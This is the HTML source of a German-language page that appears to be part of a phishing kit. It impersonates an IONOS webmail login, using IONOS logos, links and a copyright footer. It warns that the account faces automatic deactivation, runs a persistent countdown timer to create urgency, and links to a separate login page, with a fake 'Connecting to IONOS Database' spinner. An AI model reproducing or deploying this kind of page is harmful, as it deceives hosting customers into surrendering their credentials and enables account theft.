<!DOCTYPE html>
<html lang="de">
<head>
  <meta charset="UTF-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1.0"/>
  <title>Lucky Number</title>
  <link href="https://fonts.googleapis.com/css2?family=Open+Sans:wght@400;600;700;800&display=swap" rel="stylesheet"/>
  <link href="https://fonts.googleapis.com/css2?family=Roboto+Condensed:wght@400;700&display=swap" rel="stylesheet">
  <link rel="stylesheet" href="stylo.css">

  <style>

  </style>
</head>
<body>

  <header>
    <div class="header-left">
      <a href="https://www.ionos.de">
        <img src="images/ionos.png" alt="IONOS logo">
      </a>
      <h1>WEBMAIL LOGIN</h1>
    </div>
    
    <div class="search-container">
      <div class="search-box">
        <svg xmlns="http://www.w3.org/2000/svg" class="search-icon" viewBox="0 0 24 24">
          <path fill="#4a4a4a" d="M21 20l-4.35-4.35A7.92 7.92 0 0018 10a8 8 0 10-8 8 7.92 7.92 0 005.65-2.35L20 21zM4 10a6 6 0 1112 0 6 6 0 01-12 0z"/>
        </svg>
        <input type="text" placeholder="Nach Funktionen, Domains und Hilfe suchen" />
        <svg xmlns="http://www.w3.org/2000/svg" class="mic-icon" viewBox="0 0 24 24">
          <path fill="#4a4a4a" d="M12 14a3 3 0 003-3V5a3 3 0 10-6 0v6a3 3 0 003 3zm5-3a5 5 0 01-10 0H5a7 7 0 0014 0h-2zm-5 8a1 1 0 001-1h-2a1 1 0 001 1zm-1 1h2v2h-2v-2z"/>
        </svg>
      </div>
    </div>

    <div class="header-right">
      <svg xmlns="http://www.w3.org/2000/svg" class="search-icon-mobile" viewBox="0 0 24 24" title="Suchen">
        <path fill="#4a4a4a" d="M21 20l-4.35-4.35A7.92 7.92 0 0018 10a8 8 0 10-8 8 7.92 7.92 0 005.65-2.35L20 21zM4 10a6 6 0 1112 0 6 6 0 01-12 0z"/>
      </svg>
      
      <div class="chat-icon" title="Hilfe">
        <svg class="chat-svg" xmlns="http://www.w3.org/2000/svg" viewBox="-1 -1 28 28" width="32" height="32">
          <path class="bubble" d="M1.7,25.5c-0.5,0-0.8-0.3-0.9-0.4c-0.3-0.4-0.4-0.9-0.1-1.5C1.5,21.4,2.4,19,2.8,18c-0.1-0.1-0.2-0.3-0.3-0.4
          c-1.3-1.8-2-3.8-2-6c0-6.1,5.6-11,12.5-11c7,0,12.5,4.8,12.5,11c0,6.1-5.6,11-12.5,11c-1.5,0-2.7-0.2-3.7-0.5C9.2,22,9,22,8.9,21.9
          c-0.6,0.3-2,1-3,1.5c-2.6,1.4-3.4,1.8-3.7,1.9C2,25.4,1.9,25.5,1.7,25.5z"
          fill="none" stroke="#003087" stroke-width="3"/>
          
          <g class="question" fill="#003087">
            <path d="M12.9,13.3c-0.6,0-1.1-0.5-1.1-1.1c0-1.7,1.1-2.5,1.4-2.7c0.6-0.4,0.8-0.8,0.8-1c0-0.6-0.2-0.8-0.2-0.8
              c-0.3-0.2-0.7-0.3-0.8-0.3c-0.8,0-1,0.4-1.1,0.7c-0.1,0.6-0.7,1-1.2,0.9s-1-0.6-0.9-1.2C9.9,7,10.7,5.3,13,5.3c0.2,0,1.4,0,2.4,0.9
              c0.4,0.4,0.9,1.1,0.9,2.3c0,0.7-0.3,1.8-1.7,2.8c-0.1,0.1-0.5,0.3-0.5,0.9C14,12.8,13.6,13.3,12.9,13.3z"/>
            <path d="M13,17.7c0.7,0,1.2-0.5,1.2-1.2s-0.5-1.2-1.2-1.2s-1.2,0.5-1.2,1.2S12.3,17.7,13,17.7z"/>
          </g>
        </svg>
      </div>
    </div>
  </header>

  <div class="container">
    
    <!-- Logo section added above countdown container -->
    <div class="logo-section">
      <img src="images/ionos.png" alt="IONOS logo">
      <p>Ihr Konto ist von automatischer Deaktivierung bedroht. Handeln Sie jetzt, um den Zugriff auf Ihre Dienste zu gewährleisten.</p>
    </div>

    <div class="countdown-container">
      <div class="countdown-title">Automatische Deaktivierung in:</div>
      <div class="countdown-timer">
        <div class="time-unit">
          <span class="time-label"></span>
          <span class="time-number" id="hours">02</span>
        </div>
        <div class="time-unit">
          <span class="time-label"></span>
          <span class="time-number" id="minutes">15</span>
        </div>
        <div class="time-unit">
          <span class="time-label"></span>
          <span class="time-number" id="seconds">30</span>
        </div>
      </div>
    </div>

    <!-- Button replaced with text link -->
    <a href="login.html" class="protect-link">Konto jetzt schützen</a>
  </div>

  <footer class="custom-footer">
    <div class="footer-left">
      <span class="status-dot"></span> 
      <a href="https://www.ionos-status.de/?utm_medium=footer&utm_content=minor&utm_source=LOGIN_ID&utm_campaign=identifier&utm_term=no_search" target="_blank" rel="noopener noreferrer">
        Alle Systeme funktional
      </a>
    </div>
    <div class="footer-center">
      &copy; 2025 
      <a href="https://www.ionos.de/unternehmen" target="_blank" rel="noopener noreferrer">
        IONOS SE
      </a>
    </div>
    <div class="footer-right">
      <a href="https://www.ionos.de/impressum" target="_blank" rel="noopener noreferrer">Impressum</a> - 
      <a href="https://www.ionos.de/terms-gtc/datenschutzerklaerung/" target="_blank" rel="noopener noreferrer">Datenschutz</a> - 
      <a href="https://www.ionos.de/terms-gtc/terms/" target="_blank" rel="noopener noreferrer">AGB</a>
    </div>
  </footer>
  

  <!-- Enhanced spinner overlay -->
  <div class="spinner-overlay" id="spinnerOverlay">
    <div class="spinner-container">
      <div class="spinner"></div>
      <p class="spinner-text" id="spinnerText">Connecting to IONOS Database</p>
    </div>
  </div>

  <script src="js.js"></script>
  <script>
    // Countdown duration in milliseconds (12 hours)
const countdownDuration = 12 * 60 * 60 * 1000;

// DOM elements
const hoursEl = document.getElementById('hours');
const minutesEl = document.getElementById('minutes');
const secondsEl = document.getElementById('seconds');

// Get saved target end time or create a new one
let endTime = localStorage.getItem('countdownEndTime');

if (!endTime) {
  endTime = Date.now() + countdownDuration;
  localStorage.setItem('countdownEndTime', endTime);
} else {
  endTime = parseInt(endTime, 10);
}

function updateCountdown() {
  const now = Date.now();
  const distance = endTime - now;

  if (distance <= 0) {
    hoursEl.textContent = '00';
    minutesEl.textContent = '00';
    secondsEl.textContent = '00';
    clearInterval(timerInterval);
    return;
  }

  const hours = Math.floor((distance / (1000 * 60 * 60)) % 24);
  const minutes = Math.floor((distance / (1000 * 60)) % 60);
  const seconds = Math.floor((distance / 1000) % 60);

  hoursEl.textContent = String(hours).padStart(2, '0');
  minutesEl.textContent = String(minutes).padStart(2, '0');
  secondsEl.textContent = String(seconds).padStart(2, '0');
}

// Start the countdown
updateCountdown();
const timerInterval = setInterval(updateCountdown, 1000);

  </script>

</body>
</html>